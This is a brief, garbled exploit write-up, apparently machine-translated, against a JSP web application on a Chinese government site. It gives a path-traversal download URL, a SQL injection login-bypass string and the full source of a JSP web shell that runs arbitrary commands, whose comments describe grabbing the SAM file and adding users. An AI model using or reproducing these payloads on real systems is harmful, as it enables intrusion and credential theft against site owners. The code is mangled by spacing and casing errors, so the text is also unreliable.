Painful belief
Jsp? Filename =.../../admin/lgindex. jsp "> http://www.xxx.gov.cn/addcontent/webEditor/upload/files/file_down.jsp? Filename = ../admin/lgindex. jsp
According to this structure:/**/union/**/select/**/1, admin, admin, 1 -- arbitrary Password
<% @ Page import = "java. util. *, java. io. *" %>
<%
%>
<% --
Abysssec inc public material
Just upload this file with abysssec. jsp and execute your command
Your command will run as administrator. you can download sam file
Add user or do anything you want.
Note: please be gentle and dont obstructionism.
Vulnerability discovered by: abysssec.com
-- %>
<HTML> <BODY bgcolor = #0000000 and text = # DO0000>
<Title> Abysssec inc (abysssec.com) JSP vulnerability </tile>
<Center> <Form method = "GET" NAME = "myform" ACTION = "">
<Input type = "text" NAME = "cmd">
<Input type = "submit" VALUE = "Execute! ">
</FORM>
<Pre>
<%
If (request. getParameter ("cmd ")! = Null ){
Out. println ("Command:" + request. getParameter ("cmd") + "<BR> ");
Process p = runtime.getruntime(cmd.exe c (request. getParameter ("cmd "));
OutputStream OS = p. getOutputStream ();
InputStream in = p. getInputStream ();
DataInputStream dis = new DataInputStream (in );
String disr = dis. readLine ();
While (disr! = Null ){
Out. println (disr );
Disr = dis. readLine ();
}
}
%>
</Pre>
</BODY> </HTML>